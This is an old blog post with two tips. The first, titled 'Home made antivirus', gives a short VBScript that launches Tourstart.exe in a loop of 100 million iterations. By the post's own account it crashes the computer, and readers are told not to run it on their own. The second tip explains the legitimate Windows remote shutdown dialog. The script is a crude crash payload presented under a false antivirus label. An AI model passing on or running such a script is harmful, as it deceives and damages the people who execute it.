Sunday, October 26, 2008

Home made antivirus

Home made antivirus

copy this to notepad and save it as virus.vbs and click on it
It will only crash ur computer. Dont do it on urs

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

it only works with windows xp

HOW TO SHUTDOWN A REMOTE COMPUTER ON THE NETWORK

HOW TO SHUTDOWN A REMOTE COMPUTER ON THE NETWORK

Requirement: You must have administrator rights in order to remotely shutdown a computer.

How to:

1. Start>>Run and type cmd and press Enter.

2. type shutdown /i

3. add the computers on your network ,set the display timing and enter the shutdown comment.

Note: You can know what more you can do with shutdown command by typing shutdown help